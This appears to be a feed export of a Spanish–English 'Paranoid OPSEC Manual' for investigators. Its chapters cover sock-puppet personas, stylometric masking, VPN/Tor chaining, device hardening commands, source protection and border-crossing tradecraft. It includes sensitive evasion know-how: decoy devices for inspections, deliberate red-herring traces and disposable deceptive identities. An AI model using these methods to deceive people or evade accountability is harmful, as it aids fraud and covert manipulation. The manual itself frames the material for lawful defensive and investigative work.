environments and destroy intermediary drives physically. Treat all evidence as toxic data: access only when strictly necessary, minimize copies, and assume adversaries may attempt supply-chain poisoning (inserting false data into your evidence pool).
tema-opsec-completo-analista ]]>projects/opsec/opsec-data-handling-chain-of-custody.htmlProjects/opsec/opsec-data-handling-chain-of-custody.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. The Paranoid OPSEC Manual is designed for investigators, journalists, and security practitioners who operate in high-risk or hostile environments. It focuses on no-compromise methods for safeguarding identity, devices, communications, and evidence. Audience: Professionals and practitioners who require the strictest levels of anonymity and compartmentalization. Scope: Covers devices, networks, personas, communications, travel OPSEC, data handling, and adversary simulations. Approach: Layered, paranoid-level security posture; continuous validation; defense-in-depth with zero trust assumptions. Audience: OSINT investigators, journalists, DFIR analysts, CTI teams, compliance officers. Use cases: OSINT collections, dark web monitoring, covert outreach, digital forensics, source protection. Legal/Ethics: All activities must comply with applicable laws, platform ToS, and organizational ethics. This manual is for defensive and legitimate investigative use. Adversaries: Low: scammers, basic doxers, automated scraping. Medium: organized cybercrime, private intel shops, well-resourced harassers. High: state/security services, APT, cross-platform data brokers. Capabilities: data brokerage, device exploitation, SS7/SIM swap, ML-based deanonymization, cross-modal correlation (voice/face/gait), social graph inference, legal compulsion. Assets: identity, device, network location, sources, methods, evidence integrity, operational plans. Risk matrix (example): Impact (Low/Med/High) × Likelihood (Low/Med/High) → control selection & escalation. Outputs: written threat model per case; control checklist; escalation triggers. Goal: Define the foundational mindset and operational tiers that govern all other decisions in an investigation. These principles and posture levels serve as a baseline for tailoring security controls depending on case sensitivity and adversary profile. Least Exposure: Reveal only what is necessary for the task. Every extra data point can become an attack surface. Compartmentalization: Keep personas, devices, networks, and evidence completely isolated. Cross-contamination creates attribution risks. Defense-in-Depth: Layer multiple controls (technical, procedural, behavioral) so that a single failure does not expose the operation. Need-to-Know: Limit knowledge distribution both inside the team and with external stakeholders. Minimize Metadata: Strip or neutralize metadata in all shared content (photos, documents, messages). Verify, Then Trust: Assume deception by default. Validate identities, sources, and tools before use. Continuous Review: OPSEC is never static; it requires ongoing monitoring, audits, and adaptation. A four-tier posture system defines what protections to enforce depending on case sensitivity, adversary capability, and potential consequences. Use case: General OSINT browsing, public sources, low adversary risk. Controls: VPN or hardened proxy; browser with basic fingerprint protections. Hardened OS or dedicated VM. Routine patching and endpoint hygiene. Minimal persona setup, can overlap with semi-public analyst identity. Use case: Investigating scams, cybercrime forums, or potentially hostile individuals. Controls: Strict persona separation (unique email, browser profile, VM). Encrypted storage for collected data. Tor Browser or multi-hop VPN. Metadata scrubbing of all shared content. No crossover between personal and operational accounts. Use case: Dark web infiltration, adversaries with technical sophistication, potential targeting of the analyst. Controls: Dedicated hardware or Qubes/Tails OS per case. Air-gapped storage for sensitive evidence. Multi-hop anonymity (VPN→Tor, or chained VPNs). Strict logging of all actions for accountability. Persona register with lifecycle management. Two-person rule for validation of high-risk actions. Use case: Investigating state actors, organized crime, or environments with strong surveillance. Controls: Clean hardware purchased specifically for the operation. No reuse of devices, SIMs, accounts, or networks. Travel OPSEC enforced (burner devices, Faraday pouches, no personal phone). One-time use personas with no long-term footprint. Legal review and organizational approval required before operation. All communications via deniable, strongly encrypted channels. Treat L3 not as exceptional but as default baseline. Rotate between multiple hardware sets in separate jurisdictions. Maintain duplicate infrastructures (e.g., two distinct Tor/VPN paths for same task, cross-check results). Conduct threat simulation drills (e.g., adversary seizes your device in 5 min – what leaks?).
tema-opsec-completo-analista ]]>projects/opsec/opsec-fundamentos.htmlProjects/opsec/opsec-fundamentos.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Goal: Build and operate investigative personas that cannot be reliably linked to you, your organization, other personas, or prior operations—while remaining credible for the mission. Persona: A constructed identity (name, contact points, device profile, behavior) used for investigative tasks. Compartment: A self-contained environment (device/VM, browser profile, password store, comms channels) dedicated to a single persona or case. Cross‑contamination: Any shared artifact (IP address, browser fingerprint, wording quirks, reused avatars, payment trail) that can link compartments. One Persona = One Compartment (device/VM, browser, password vault, comms, storage). No sharing. Zero Reuse Rule: No reuse of usernames, avatars, bios, recovery emails/phones, payment instruments, or VPN egress IPs across personas. Attribution Budget: Treat every artifact as a potential identifier. Keep the sum of identifiers per persona as low as possible. Lifecycle Discipline: Plan for provision → operate → rotate → retire, with documented criteria for each step. Plan Define objectives, target platforms, required credibility (age of account, posting cadence, social graph). Choose risk level (L0–L3) from §3 and map mandatory controls. Run a pre‑provision conflict check to avoid collisions with real people/brands. Provision Create unique credentials and recovery channels (no overlap with other personas). Stand up dedicated VM/OS (Qubes domain, separate VM, or dedicated device) and browser profile. Establish contact points (email/number) and 2FA (hardware token per persona). Operate Follow a content and engagement script (topics, tone, posting windows, reaction policy). Maintain network separation (distinct VPN exit/Tor circuit). Log sessions for post‑op review. Keep a persona register (metadata and link graph) updated after each session. Rotate (when exposure risk rises or objectives change) Change exit IP ranges, posting windows, and low‑value attributes. Re‑issue credentials and regenerate keys as required. Retire Tombstone gracefully (final benign message or silence, depending on OPSEC). Archive evidence, export logs, revoke tokens, destroy keys/seeds, wipe or reimage the compartment. Biographic outline: plausible age, locale, language variant, time‑zone; avoid copying personal details or unique biographical events. Backstory & cover: minimal and congruent (job/education kept generic). Keep statements easy to maintain under questioning. Style & linguistics: align spelling, idioms, and punctuation with claimed locale. Randomize rhythm; avoid distinctive catchphrases. See §13.4 for stylometry OPSEC. Visual identity: avatars/banners with lawful, licensed stock or purpose‑made media. Avoid reusing GAN portraits across personas (researchers can cluster style). Strip EXIF before upload. Social graph: follow/connect gradually, mirroring normal user behavior. Seed with low‑risk follows before target engagement. Email
Create per‑persona mailboxes with providers supporting privacy and aliases: Proton (https://proton.me), Tuta (https://tuta.com). Consider relay/aliasing (e.g., SimpleLogin https://simplelogin.io/ or AnonAddy https://anonaddy.com/) for site‑specific addresses. Enable 2FA; prefer FIDO2 hardware keys (per‑persona token). Keep recovery codes offline in the compartment vault. Phone / Voice
Use lawful VoIP/burner services with clear ToS (e.g., JMP.chat https://jmp.chat/). Avoid numbers tied to your identity; understand KYC requirements by jurisdiction. For high‑risk ops, avoid voice/SMS verification; prefer app‑based or hardware 2FA when platforms allow. Domains & Web Presence (optional) If persona needs a site, register with WHOIS privacy enabled; separate registrar account and payment method; no analytics. Host static-only pages; disable logs where legal. Payments Use organization‑approved methods (virtual cards, prepaid where lawful). Keep receipts in encrypted vault; never reuse payment instruments across personas. Device/VM: one VM per persona (e.g., Qubes persona‑x AppVM) or a dedicated laptop. Snapshots before/after operations. Browser: dedicated profile per persona. Prefer Tor Browser (no extensions) or Brave hardened profile. Disable password sync/cloud features. Password store: separate KeePassXC vault per persona with its own strong passphrase; store in the persona’s compartment only. Key material: per‑persona PGP keys (GnuPG). Keep master/backup offline; use subkeys operationally. Storage: encrypt at rest (VeraCrypt/LUKS). Distinct containers for evidence vs. persona working data. Exit isolation: each persona uses a distinct VPN egress IP or Tor circuit. Do not alternate multiple personas over the same exit during overlapping windows. Leak control: enforce DNS/IPv6/WebRTC hardening. Validate at ipleak.net after every environment change. Session windows: schedule distinct activity windows per persona (time‑zone believable for the cover story). Vary posting times within natural ranges. Geo‑consistency: ensure IP geolocation matches claimed region; align with language and content cadence. Content script: predefine acceptable topics, tone, and red lines. Avoid statements that demand deep domain knowledge you cannot sustain. Engagement playbook: expected responses to DMs, friend requests, and provocations. Use templated, low‑commitment replies where possible. Attachments: scrub metadata (MAT2/ExifTool) and validate file types before opening inbound media. Never open untrusted files in the same compartment used for persona comms—use a disposable analysis VM. Cross‑platform discipline: do not copy/paste verbatim text across platforms. Vary formatting and timing to reduce correlation risk. Before first use, run an OSINT collision scan: search proposed names/handles, image reverse‑search for avatars, and check for brand conflicts.
Periodically audit the persona with outside‑in tests: browser fingerprint checks (AmIUnique), leaked credential searches (HaveIBeenPwned https://haveibeenpwned.com/), and social graph diffusion (manual review). Plant low‑risk canary interactions (e.g., distinct redirects) to detect unintended cross‑links between compartments. Rotation triggers: platform KYC prompts, unusual login alerts, direct targeting, change in mission scope, or accumulated attribution budget. Rotation actions: change exit infrastructure, regenerate keys, adjust posting windows/tone, refresh avatar/biographic minor details (keep core identity consistent to avoid suspicion). Retirement: export evidence, revoke API tokens, delete or freeze accounts per policy, destroy keys/seeds, wipe/reimage the compartment. Update the persona register to RETIRED with rationale and date. Maintain a Persona Register (stored inside an encrypted case vault): Persona ID, Handle(s), Creation Date, Purpose/Case, Risk Level (L0–L3), Email, Phone/IM, 2FA method, Device/VM ID, VPN/Tor profile, Notes on style/locale, Known contacts, Rotation history, Retirement date & reason. Checklists (quick use): Pre‑Provision: name/handle collision check; decide risk level; prepare VM; create email/2FA; set password vault; note recovery codes. Go‑Live: fingerprint test; IP geo check; seed social graph; first low‑risk posts; log session. Ongoing: vary cadence; keep logs; run periodic linkage tests; update register. Sunset: archive, revoke, wipe, document. Use one-time personas – identities should exist only for a single task, then be retired. Operate personas exclusively on burner hardware purchased anonymously and destroyed after use. Apply stylometric masking: alter writing style, vocabulary, errors, and tone depending on the persona. Maintain multi-layered identities: one as a primary cover, one as a decoy, and one as a “sacrificial” persona ready for intentional exposure. Never repeat the same activity patterns (time of day, session length, UI language) across multiple personas.
tema-opsec-completo-analista ]]>projects/opsec/opsec-identity-compartmentalization.htmlProjects/opsec/opsec-identity-compartmentalization.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Even the best OPSEC setups degrade over time. Software updates, new adversary capabilities, and operator mistakes introduce fresh risks. Regular monitoring ensures that vulnerabilities are caught before they become catastrophic failures. Perform monthly audits of all OPSEC compartments. Use a structured checklist:
Verify browser fingerprints via Cover Your Tracks or BrowserLeaks. Confirm VPN, Tor, and proxy routing; test for DNS/WebRTC leaks. Inspect devices for unauthorized services, rootkits, or persistence mechanisms. Check logging and metadata retention policies. Test kill-switches and emergency wipe mechanisms. Document results and track changes over time. Conduct red team tests: allow trusted analysts to attempt deanonymization or correlation attacks. Run purple team drills: simulate persona compromise and measure detection + containment time. Scenarios should include: Device seizure. Metadata correlation across personas. Stylometric attribution. Social engineering or phishing. Maintain written after-action reports with lessons learned. When compromise is suspected or confirmed: 1. Containment Isolate compromised devices or accounts immediately. Trigger kill-switches if supported (wipe storage, disable accounts). 2. Rotation Replace compromised credentials, encryption keys, and devices. Retire affected personas and migrate operations to fresh compartments. 3. Notification Inform stakeholders who may be affected (team members, trusted partners). Share IOCs (indicators of compromise) with relevant internal parties. 4. Threat Model Update Reassess adversary capabilities in light of the compromise. Identify what information was likely exposed. 5. Post-Incident Review Conduct root cause analysis: what failed — tool, process, or operator discipline? Update SOPs and training to prevent recurrence. Maintain records for accountability and long-term tracking. Run continuous monitoring agents inside disposable VMs to automatically alert on fingerprint drift or unexpected outbound connections. Deploy canary personas that exist solely to act as early-warning systems when touched by adversaries. Use decoy infrastructures (fake servers, dummy accounts) to track intrusion attempts. Maintain parallel redundant infrastructures: if one network or device stack is burned, instantly switch to a cold standby. Practice instant evacuation drills: operators rehearse what to do if devices are seized in real time. Automate nuclear kill-switches: one command wipes devices, revokes keys, disables accounts, and retires personas across multiple jurisdictions. Treat every incident as an opportunity for adversary intelligence gathering — capture their TTPs (tactics, techniques, procedures) during the breach.
tema-opsec-completo-analista ]]>projects/opsec/opsec-monitoring-audits.htmlProjects/opsec/opsec-monitoring-audits.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Networks are often the weakest link in OPSEC. Even if devices are hardened, traffic analysis, metadata collection, and interception can compromise identities. Passive surveillance: ISPs, IXPs, governments recording traffic. Active interception: MITM, rogue access points, DNS poisoning. Metadata correlation: timing analysis, packet size signatures, cross-jurisdiction data sharing. Commercial tracking: advertising networks, third-party analytics. Use only trusted, audited VPNs with strong no-log policies. Prefer VPN providers outside your own jurisdiction. Avoid free or unverified VPNs (high risk of data monetization). Chain VPNs with Tor when stronger unlinkability is needed. Always test for DNS and WebRTC leaks after connecting. Tor Browser ensures traffic looks like every other Tor user. Bridges and pluggable transports (obfs4, meek) help evade censorship. Never log into personal accounts via Tor. Use separate circuits for different personas. Be mindful of exit node monitoring – never transmit plaintext sensitive data. HTTP/SOCKS proxies can add layers but do not provide encryption. Use multi-hop configurations: VPN → Tor → Proxy or vice versa. For OSINT scraping, rotating proxies can reduce account lockouts. Avoid commercial “residential proxy” services tied to user devices (ethical and OPSEC concerns). Use encrypted DNS (DoH or DoT). Consider self-hosted recursive resolvers (e.g., Unbound, Knot Resolver). Be aware that DNS queries often reveal as much as web traffic itself.
Monitor with tools like dnscrypt-proxy. Never connect to public Wi-Fi without VPN or Tor. Assume hotel, airport, and café Wi-Fi are hostile by default. Randomize MAC addresses (modern OS can do this automatically). Prefer tethered connections from burner mobile devices when possible.
Always enforce HTTPS (use HTTPS Everywhere or built-in equivalents). Validate certificates when in doubt; avoid click-through. Consider using TLS fingerprint randomization (e.g., uTLS libraries for custom clients).
Check connections with Wireshark or mitmproxy.
Test VPN leaks at ipleak.net. Run periodic audits: does your IP/geolocation ever leak? Chain multiple independent network layers: e.g., local VPN → Tor → foreign VPN → custom proxy. Each in a different jurisdiction. Rotate entire network stacks frequently — new SIM, new VPN provider, new Tor bridges — to avoid long-term correlation. Treat all ISPs as compromised: never rely on provider secrecy. Use satellite internet or shortwave/radio links in extreme denial-of-service or censorship scenarios. For sensitive transfers, use sneakernet: physically move data on encrypted drives via trusted couriers instead of any online channel. Employ traffic shaping and padding (e.g., obfs4, meek, Snowflake, VPN obfuscation modes) to make packet sizes and timing indistinguishable. Consider multi-jurisdictional relays you control (self-hosted VPN endpoints in foreign countries). For ultimate deniability: one-time network identities – a SIM or access point is used only once, then permanently discarded. Importado desde Inbox/Cibervigilancia de Redes.md durante consolidacion bulk. Indice maestro que organiza todas las fuentes para cibervigilancia del underground digital. Agrupa categorias de fuentes: pastes, Telegram, foros underground, mercados negros, motores de busqueda Tor, mercados de exploits, grupos de ransomware y Twitter.Cibervigilancia / Fuentes underground / Indice maestro. Punto de partida para operaciones de cibervigilancia del underground Seguimiento de threat actors en multiples plataformas Deteccion temprana de filtraciones de datos Monitoreo de mercados de exploits y ransomware Este es el indice principal para cibervigilancia - cada enlace lleva a un catalogo detallado
threat-actor-search y threat-actor-search son los catalogos mas extensos Mantener actualizado el estado online/offline de las fuentes
tema-opsec-completo-analista ]]>projects/opsec/opsec-network-transport-security.htmlProjects/opsec/opsec-network-transport-security.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Goal: Prevent endpoint compromise and leakage of identifiers by hardening platforms, controlling execution, encrypting data, and validating boot trust. Controls are mapped to posture levels (L0–L3) from §3.
Qubes OS — strong compartmentalization via Xen VMs; ideal for L2–L3 where isolation between personas/cases is mandatory. https://www.qubes-os.org/
Tails — amnesic, Tor‑routed live OS; ideal for one‑off high‑risk browsing or sensitive transfers (L2–L3). https://tails.boum.org/
Whonix — Tor‑gateway + workstation model inside VMs; good for anonymity workflows (L1–L2). https://www.whonix.org/ Hardened Linux (Debian/Fedora/Ubuntu) — daily driver with AppArmor/SELinux enforced; suitable for L0–L2. Windows 11 (Hardened) — enable BitLocker, VBS/HVCI, WDAC/ASR; enterprise telemetry minimized; suitable for L0–L2. macOS (Hardened) — FileVault, Gatekeeper, notarization; consider Lockdown Mode on iOS companion devices; suitable for L0–L2.
Mobile (GrapheneOS) — hardened Android with strong permission model; use as comms endpoint for L1–L3. https://grapheneos.org/ Mapping tip: If your adversary can compel providers or run device exploits → prefer Qubes/Tails + strict compartmentalization. UEFI Secure Boot: ON; vendor keys or custom MOK where needed. Linux check: mokutil --sb-state; Windows check: Confirm-SecureBootUEFI. TPM 2.0: present and owned; bind disk encryption to TPM+PIN where feasible. BIOS/UEFI: admin password set; external boot disabled; Thunderbolt security enabled; DMA protection on.
Firmware updates: apply via LVFS/fwupd where supported: fwupdmgr get-devices && fwupdmgr get-updates (https://fwupd.org/). Record versions in the case log. Full‑Disk Encryption: Linux: LUKS2 with strong PBKDF (argon2id), separate /boot if Secure Boot measured. Windows: BitLocker (XTS‑AES‑256), recovery key stored offline. macOS: FileVault 2 (enable institutional recovery key if in org setting).
Hidden/deniable volumes: VeraCrypt containers for sensitive materials (https://www.veracrypt.fr/). Use cautiously and lawfully. Secrets management:
Passwords in KeePassXC (one vault per persona/case): https://keepassxc.org/
Crypto/short secrets with age or GnuPG: https://github.com/FiloSottile/age • https://gnupg.org/
Hardware tokens (FIDO2/OpenPGP): YubiKey / SoloKeys for per‑persona 2FA & key storage: https://www.yubico.com/ • https://solokeys.com/ Windows: WDAC (Windows Defender Application Control) policy or AppLocker allowlists for L2–L3. ASR Rules (Attack Surface Reduction): block Office child processes, script abuse, and LSASS credential theft. Enable via PowerShell (see §5.13). Controlled Folder Access for ransomware mitigation. Linux:
AppArmor/SELinux in enforcing mode; use Flatpak for sandboxed apps; Firejail to isolate risky binaries: https://firejail.wordpress.com/ macOS: Gatekeeper enabled; restrict to App Store + identified developers; leverage TCC prompts; avoid kexts; disable unsigned system extensions. USB: Disable autorun everywhere.
Linux: USBGuard (allowlist policy): https://usbguard.github.io/ Windows: Group Policy → Device Installation Restrictions (block new device classes except approved). Network radios: disable unused (BT/NFC); randomize Wi‑Fi MAC; avoid auto‑join. HID injection defenses: restrict new keyboards/mice; verify device IDs on connection; prefer data‑only USB cables for charging. Patching: OS and firmware monthly (or faster for L2–L3); browser daily. Telemetry: reduce to minimum compatible with security; avoid 3rd‑party analytics in investigative compartments. Logging: capture local security logs needed for audits, but export to an encrypted vault separate from operational compartments. Do not transmit logs to external cloud SIEMs from sensitive personas without de‑identification policies. 3 copies, 2 different media, 1 offline/off‑site.
Tools: BorgBackup (https://www.borgbackup.org/), restic (https://restic.net/), rclone (https://rclone.org/). Always encrypt backups (repo keys offline); test restores quarterly; hash manifests. Device policy: separate phones for personal vs. operational personas; prefer GrapheneOS for Android; iOS use Lockdown Mode where threat justifies. Baseband risk: assume cellular radio is observable; avoid sensitive ops on mobile networks; prefer wired or trusted Wi‑Fi via VPN/Tor. Permissions: deny default access to mic/camera/location; use hardware camera shutters and mic mute switches when available. Maintain golden VM templates per posture level (L0–L3). Provision ephemeral linked clones per case/persona; destroy after operation. Automate hardening with Ansible (Linux) or PowerShell DSC/Intune (Windows) to keep builds consistent and auditable. Windows Defender with ASR + cloud protection on is acceptable for many L0–L1 use cases; for L2–L3 consider stricter WDAC and reduced telemetry profiles. Linux/macOS: lightweight AV (ClamAV) as needed; rely on sandboxing and least‑privilege. Avoid vendor agents that introduce identifiable telemetry into sensitive compartments. Boot & encryption status Linux: Secure Boot: mokutil --sb-state • TPM: tpm2_getcap properties-fixed LUKS volumes: lsblk -f then cryptsetup status <mapper> Windows PowerShell: Secure Boot: Confirm-SecureBootUEFI BitLocker: Get-BitLockerVolume | Select MountPoint,VolumeStatus,EncryptionMethod VBS/HVCI: Get-CimInstance -ClassName Win32_DeviceGuard | Select * macOS: FileVault: fdesetup status • Gatekeeper: spctl --status Sample hardening commands (Windows, run as Admin)# Enable key ASR rules (example subset) $rules = @( "D4F940AB-401B-4EFC-AADC-AD5F3C50688A", # Block Office child processes "3B576869-A4EC-4529-8536-B80A7769E899", # Block credential stealing from LSASS "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC", # Block execution of potentially obfuscated scripts "BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550" # Block executable content from email and webmail ) Add-MpPreference -AttackSurfaceReductionRules_Ids $rules -AttackSurfaceReductionRules_Actions Enabled # Turn on Controlled Folder Access Set-MpPreference -EnableControlledFolderAccess Enabled # Check BitLocker status Get-BitLockerVolume | Format-Table -AutoSize Sample hardening commands (Linux)# AppArmor enforcing sudo aa-status || sudo aa-enforce /etc/apparmor.d/* # Verify Secure Boot and firmware updates mokutil --sb-state fwupdmgr get-devices && fwupdmgr get-updates # Create and mount a LUKS2 container sudo dd if=/dev/zero of=secure.img bs=1M count=4096 sudo cryptsetup luksFormat --type luks2 --pbkdf argon2id secure.img sudo cryptsetup open secure.img securevault sudo mkfs.ext4 /dev/mapper/securevault && sudo mount /dev/mapper/securevault /mnt Record all settings (with commands and outputs) in the case log for auditability and repeatability. Rely only on disposable devices (burner laptops/phones) that are physically destroyed after the mission. Configure hardware entirely offline with custom firmware (e.g., coreboot, Heads) and your own Secure Boot keys. Never store credentials or keys in RAM – assume adversaries can perform cold boot attacks. Split operations across dedicated machines: one for research, one for communications, one for data analysis. Apply an air-gap-first policy: evidence analysis and archival should only occur on machines with no network interfaces. In extreme contexts: use hardware purchased abroad, operated only locally, never transported across borders.
tema-opsec-completo-analista ]]>projects/opsec/opsec-device-endpoint-security.htmlProjects/opsec/opsec-device-endpoint-security.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Even when devices, networks, and personas are secure, behavioral patterns can betray an operator. Adversaries often exploit: Writing style and tone (stylometry). Posting times and activity windows. Choice of topics and vocabulary. Cross-platform behavior overlaps. Psychological manipulation via social engineering. Avoid posting from personal and operational accounts on the same device. Vary posting times to avoid time zone correlation. Avoid consistent idioms, emoji use, or unique phrasing across personas. Do not recycle avatars, bios, or interests between identities. Strip metadata from uploaded images and files. AI and forensic tools can match authorship based on writing style. To reduce risks: Shorten sentences, vary structure, and change punctuation habits. Use different spelling variants (US vs UK English, etc.) across personas. Randomize vocabulary and tone (formal vs casual). Use text transformation tools sparingly; verify for naturalness. Keep strict separation: one device/VM per persona per platform. Do not link accounts via friends, likes, or follows. Rotate platforms used by different personas (one may use Reddit, another Twitter). Avoid uploading unique personal photos (landmarks, personal items in background). Treat every interaction as potentially monitored or archived. Adversaries may attempt to draw you into voice or video calls. Be cautious with interviews, “friendly” chats, or insider approaches. Assume every DMs log is permanent, even on platforms promising ephemerality. Use decoy behavior when necessary to build plausible context for a persona. Operate under multiple behavioral covers: One highly active and noisy persona (decoy). One quiet observer persona (low-profile). One sacrificial persona ready for controlled exposure. Employ linguistic camouflage: deliberately switch language families (e.g., Slavic → Romance) or adopt regional slang consistent with cover identity. Use behavioral randomization schedules: randomize log-in times, activity durations, and content posting intervals via automated scripts. Employ machine-assisted text rewriting to generate diverse styles per persona — but cross-check for unnatural consistency. For maximum safety: maintain non-digital covers (real-world identities, safehouse routines) to backstop online personas. Introduce contradictory digital traces deliberately (red herrings) to pollute adversary attribution attempts. Assume all platforms perform cross-device correlation — therefore, rotate hardware, IP, and behavioral signatures in sync.
tema-opsec-completo-analista ]]>projects/opsec/opsec-social-behavioral.htmlProjects/opsec/opsec-social-behavioral.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Human sources (HUMINT) are among the most vulnerable assets in any operation. They can be exposed by metadata leaks (calls, chats, location). Surveillance or interception may compromise meetings. Mishandling evidence can reveal identities. Psychological pressure or social engineering can extract information. Protecting sources requires both digital and physical OPSEC, as well as strong interpersonal tradecraft. Avoid storing source identities on personal or operational devices. Use secure communication channels (Signal, Session, Briar, SecureDrop). Strip metadata from all files before storage or transfer. Maintain separate digital compartments for each source. Never reveal one source’s existence to another. Select safe meeting locations with multiple exits and low surveillance coverage. Avoid predictable schedules; vary routes and timing. Pre-establish emergency signals and fallback procedures. Never bring personal or unnecessary electronic devices to meetings. Minimize time together to reduce exposure. Build trust gradually; never overload a source with sensitive tasks early. Protect their psychological safety: avoid paranoia-inducing practices unless necessary. Ensure clarity of expectations: what is shared, how, and under what risks. Use need-to-know principles: sources should not have more context than necessary. Always verify source claims with independent evidence. Keep detailed logs of source interactions, but anonymize identifiers. Store sensitive notes in encrypted, compartmentalized archives. Protect against internal leaks: limit who has access to raw source intelligence. Never carry any digital record of a source’s identity — commit identifiers to memory or use deniable physical ciphers (e.g., codes hidden in innocuous notes). Use non-digital dead drops: physical objects, chalk marks, coded signals. When digital transfer is unavoidable, use multi-hop anonymization: source → disposable device → one-time relay → analyst. Conduct pre-meeting counter-surveillance sweeps (RF scanners, thermal cameras, observation detection routes). Employ psychological decoys: run parallel fake meetings with sacrificial sources to divert adversary attention. Use air-gapped communication kits: encrypted messages transferred only via offline devices and removable media. Establish multi-layered deniability: if the source is caught, their digital and physical traces must point to a benign cover. In hostile regimes: avoid in-person meetings entirely; rely on proxy intermediaries or coded public signals (graffiti, innocuous online posts).
tema-opsec-completo-analista ]]>projects/opsec/opsec-source-protection-humint.htmlProjects/opsec/opsec-source-protection-humint.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Hash all files in a folder: sha256sum * > hashes.txt Strip metadata: mat2 *.pdf *.jpg *.png PGP key generation (GnuPG): gpg --quick-gen-key "Persona X <x@proton.me>" ed25519 cert sign 2y Tor-only egress (Linux iptables example): Test DNS/WebRTC leaks: visit https://ipleak.net/ and ensure no IPv6/WebRTC disclosures.
Maintained by Oryon + OSINT360. This document is part of the Cyber Intelligence Toolkit project.
tema-opsec-completo-analista ]]>projects/opsec/opsec-templates-automation.htmlProjects/opsec/opsec-templates-automation.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Common needs: detect manipulation, verify authenticity, inspect metadata.
Check EXIF metadata → ExifTool – extract, analyze, and compare image metadata fields.
Detect editing or cloning → Forensically – error level analysis, clone detection, noise analysis.
Sensor-level verification → Noiseprint – identify device PRNU fingerprint.
Verify text/logos in images → OCRmyPDF or Tesseract – OCR for suspicious text. Common needs: analyze frames, detect deepfakes, validate context.
Extract keyframes / thumbnails → InVID Plugin – frame capture, reverse search, metadata inspection.
Inspect encoding & frames → FFmpeg – codec analysis, frame-by-frame breakdown.
Detect deepfake manipulation → SensityAI or Reality Defender – ML-based deepfake detection.
Cross-check weather & lighting → SunCalc + Meteostat – shadow and weather validation. Common needs: detect synthetic voices, validate background context, inspect signals.
Spectrogram & waveform inspection → Audacity – generate spectrograms, detect anomalies.
Phonetic & acoustic features → Praat – jitter, shimmer, pitch contour analysis.
Detect synthetic voices → Intel FakeCatcher or Deepware Scanner. Validate ambient audio → Compare environmental sounds with expected context (traffic, birds, etc.). Common needs: detect AI-generated text, check citations, validate style.
Spot AI-generated scaffolding → GLTR – token probability analysis.
Alternative AI detection → DetectGPT – detect likelihood of LLM text.
Stylometric comparison → JStylo – author attribution & writing style analysis.
Check fabricated citations → Manual validation + Crossref or Google Scholar. Common needs: validate time, place, and consistency across modalities.
Verify location → Google Earth + Street View.
Check shadows & sun position → SunCalc.
Weather validation → Meteostat or OGIMET. Narrative consistency → Manual cross-check across text, image, video, audio. Common needs: check provenance, file signatures, hidden markers.
Extract all metadata → ExifTool – universal metadata extraction.
Provenance verification → C2PA or Adobe Content Credentials.
Watermark detection → Google SynthID (when supported).
Sensor noise & compression → Noiseprint. Common needs: maintain anonymity, secure comms, manage personas.
Anonymous file transfer → OnionShare or Magic Wormhole.
Password management → KeePassXC.
OS isolation → Tails for amnesic sessions, Qubes OS for compartmentalization.
Browser fingerprint testing → AmIUnique or CoverYourTracks.
tema-opsec-completo-analista ]]>projects/opsec/opsec-tools-utilities.htmlProjects/opsec/opsec-tools-utilities.mdTue, 28 Apr 2026 14:29:12 GMTmanual-paranoid-opsec. Cada capitulo es una nota propia para consulta directa por dominio operativo. Travel introduces unique risks that combine digital, physical, and human vulnerabilities. Border searches may include device confiscation, forensic imaging, or forced account access. Hotels, airports, and conference venues often have compromised Wi-Fi and surveillance systems. Physical surveillance teams may track movement, habits, or meeting patterns. Carrying sensitive data across jurisdictions increases exposure to lawful intercept and coercion. Define the mission’s minimum digital footprint — take only the devices and data you truly need. Use burner devices instead of personal hardware. Prepare devices with minimal local data; everything else should be in encrypted containers stored offline. Research local laws (encryption, journalism, data handling) to anticipate risks at customs. Use dummy accounts or benign identities to handle casual inspections. Assume all luggage is subject to search; carry sensitive items on your person if possible. Power down devices before travel — reduces risk of live memory extraction. Use encrypted drives with plausible deniability (hidden volumes). Carry only throwaway SIM cards; avoid roaming on personal accounts. Keep devices in Faraday pouches when not in active use. Treat all public Wi-Fi as hostile; use VPN/Tor. Avoid logging into sensitive accounts on hotel or conference networks. Use tethered mobile data instead of shared networks. Be cautious of room safes; many can be opened with default codes. Watch for physical tampering on locks, doors, or devices left unattended. Use varied routes and schedules to avoid pattern detection. Arrange meetings in neutral locations with multiple exits. Limit use of taxis or rideshares that log identity and travel patterns. Keep situational awareness: surveillance cameras, suspicious observers, or unusual activity. Travel only with single-use, anonymous devices purchased specifically for that trip. Destroy them afterward. Carry no sensitive data across borders; instead, transfer via trusted couriers, encrypted cloud dead-drops, or steganographic methods. Pre-stage equipment in the target country (purchased anonymously by proxies). Use Faraday bags at all times except during active operations; assume all radios (Wi-Fi, Bluetooth, GSM) are beacons. Employ anti-surveillance techniques: detect tails, use counter-surveillance routes, monitor for hostile surveillance gear (RF detectors, thermal sweeps). Use layered decoy devices: a “clean” laptop for inspection, another hidden and encrypted for actual work. Maintain false travel narratives — prepare cover stories, benign digital accounts, and plausible explanations for all devices carried. In hostile states: avoid carrying any digital equipment; rely entirely on non-digital tradecraft (paper, codes, human couriers).
tema-opsec-completo-analista ]]>projects/opsec/opsec-travel-physical-security.htmlProjects/opsec/opsec-travel-physical-security.mdTue, 28 Apr 2026 14:29:12 GMTopsec-fundamentos — Overview + 1 Scope & Assumptions + 2 Threat Modeling + 3 OPSEC Principles & Posture Levels.
opsec-identity-compartmentalization — Cap. 4: sock puppets, persona compartmentalization, alias management.
